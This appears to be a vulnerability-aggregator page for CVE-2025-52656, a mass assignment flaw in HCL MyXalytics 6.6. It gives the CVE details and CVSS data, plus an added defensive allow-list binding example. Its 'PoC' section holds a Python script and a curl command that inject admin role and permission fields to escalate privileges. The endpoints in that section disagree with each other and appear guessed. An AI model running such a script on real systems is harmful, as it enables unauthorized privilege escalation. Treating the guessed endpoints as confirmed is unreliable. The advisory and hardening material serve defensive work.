Security Vulnerability Report
CVE-2025-52656 CVSS 7.6 HIGH

CVE-2025-52656

Published: 2025-10-03 19:15:47
Last Modified: 2025-10-08 16:50:39

Description

HCL MyXalytics 6.6 is affected by a Mass Assignment vulnerability. Mass Assignment occurs when user input is automatically bound to application objects without proper validation or access controls, potentially allowing unauthorized modification of sensitive fields.
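The following is an added example and is not HCL MyXalytics code; the profile model, the JSON field names and the request body are constructed to illustrate the defect class described above. It contrasts naive binding, where every key in the request that matches a model attribute is copied onto the object, with allow-list binding, where a self-service profile update may touch only an explicit set of fields and any other key is rejected (and can be logged as a probing attempt).

```python
"""Mass assignment: naive binding versus allow-list binding.

Illustrative code added alongside the CVE record; it is not vendor code.
The model, field names and request shape are constructed for the example.
"""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class UserProfile:
    first_name: str
    last_name: str
    email: str
    department: str = ""
    role: str = "USER"        # privileged: must never be set from client input
    is_admin: bool = False    # privileged
    permissions: tuple = ()   # privileged


# Keys a self-service profile update is allowed to change (assumed names).
PROFILE_WRITABLE = frozenset({"firstName", "lastName", "email", "department"})

# JSON key -> model attribute (assumed mapping for this example).
JSON_TO_ATTR = {
    "firstName": "first_name", "lastName": "last_name", "email": "email",
    "department": "department", "role": "role", "isAdmin": "is_admin",
    "permissions": "permissions",
}


def bind_unsafe(user: UserProfile, body: dict) -> UserProfile:
    """Vulnerable pattern: any request key that maps to a model attribute is bound."""
    updates = {}
    for key, value in body.items():
        attr = JSON_TO_ATTR.get(key)
        if attr is not None:
            updates[attr] = tuple(value) if attr == "permissions" else value
    return replace(user, **updates)


class RejectedFields(ValueError):
    """Raised when a request carries keys outside the allow-list."""


def bind_allowlist(user: UserProfile, body: dict,
                   writable: frozenset = PROFILE_WRITABLE) -> UserProfile:
    """Hardened pattern: bind only allow-listed keys with the expected type;
    reject the whole request if anything else is present, so the attempt is
    visible to the caller and can be logged."""
    unexpected = sorted(set(body) - writable)
    if unexpected:
        raise RejectedFields(f"unexpected fields in profile update: {unexpected}")
    for key, value in body.items():
        if not isinstance(value, str):
            raise RejectedFields(f"field {key!r} must be a string")
    return replace(user, **{JSON_TO_ATTR[k]: v for k, v in body.items()})


# Constructed request body of the kind a mass-assignment probe sends: the
# expected profile fields plus privileged ones the UI never exposes.
SAMPLE_BODY = {
    "firstName": "John", "lastName": "Doe", "email": "john.doe@example.test",
    "department": "Analytics",
    "role": "ADMIN", "isAdmin": True, "permissions": ["ALL"],
}


def demo():
    """Return (result of naive binding, rejection message, result of safe binding)."""
    user = UserProfile("Jane", "Roe", "jane.roe@example.test")
    escalated = bind_unsafe(user, SAMPLE_BODY)
    try:
        bind_allowlist(user, SAMPLE_BODY)
        rejected = None
    except RejectedFields as exc:
        rejected = str(exc)
    filtered = {k: v for k, v in SAMPLE_BODY.items() if k in PROFILE_WRITABLE}
    safe = bind_allowlist(user, filtered)
    return escalated, rejected, safe


if __name__ == "__main__":
    escalated, rejected, safe = demo()
    print("naive binding  ->", escalated)
    print("allow-list     ->", rejected)
    print("safe update    ->", safe)
```

Rejecting rather than silently dropping unknown keys is the deliberate choice here: a dropped key hides the probe, whereas a rejected request produces a 4xx and a log line that detection rules can match on. The same allow-list belongs in the ORM or framework binder (a DTO or explicit `fields` list) rather than in ad-hoc view code, so every update endpoint gets it.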

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:dryice_myxalytics:6.6:*:*:*:*:*:*:* - VULNERABLE
HCL MyXalytics 6.6
HCL MyXalytics < 6.6 (possibly affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-52656 - HCL MyXalytics 6.6 Mass Assignment PoC
# This PoC demonstrates the Mass Assignment vulnerability by sending
# additional privileged fields in a normal user request.
import requests
import json

# Target configuration
TARGET_URL = "https://target-myxalytics-host:port"
SESSION_COOKIE = "JSESSIONID=your_session_cookie_here"

# Step 1: Intercept a normal profile update request
# Normal user fields that are expected
normal_fields = {
    "firstName": "John",
    "lastName": "Doe",
    "email": "[email protected]",
    "department": "Analytics"
}

# Step 2: Add malicious fields (Mass Assignment payload)
# These fields are not exposed in the UI but will be bound to the model
malicious_fields = {
    "role": "ADMIN",              # Privilege escalation
    "isAdmin": True,              # Admin flag
    "permissions": ["ALL"],       # Full permissions
    "accountStatus": "ACTIVE",    # Account status manipulation
    "userLevel": 99,              # User level escalation
    "groupId": "admin_group_001"  # Admin group assignment
}

# Combine normal and malicious fields
payload = {**normal_fields, **malicious_fields}

# Step 3: Send the crafted request
headers = {
    "Content-Type": "application/json",
    "Cookie": SESSION_COOKIE,
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
}

try:
    response = requests.post(
        f"{TARGET_URL}/api/user/profile/update",
        headers=headers,
        data=json.dumps(payload),
        verify=False
    )
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")

    # Step 4: Verify privilege escalation
    if response.status_code == 200:
        verify_response = requests.get(
            f"{TARGET_URL}/api/user/profile",
            headers=headers,
            verify=False
        )
        print(f"Updated Profile: {verify_response.text}")
except Exception as e:
    print(f"Error: {e}")

# Alternative: Using curl command
# curl -X POST "https://target/api/user/update" \
#   -H "Content-Type: application/json" \
#   -H "Cookie: JSESSIONID=xxx" \
#   -d '{
#     "firstName": "John",
#     "lastName": "Doe",
#     "email": "[email protected]",
#     "role": "ADMIN",
#     "isAdmin": true,
#     "permissions": ["ALL"]
#   }'
```

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124411 (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-52656", "sourceIdentifier": "[email protected]", "published": "2025-10-03T19:15:46.637", "lastModified": "2025-10-08T16:50:39.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL MyXalytics: 6.6.  is affected by Mass Assignment vulnerability. Mass Assignment occurs when user input is automatically bound to application objects without proper validation or access controls, potentially allowing unauthorized modification of sensitive fields."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-915"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:dryice_myxalytics:6.6:*:*:*:*:*:*:*", "matchCriteriaId": "63206848-DCF7-4835-A58C-5F3E7F455E5C"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124411", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```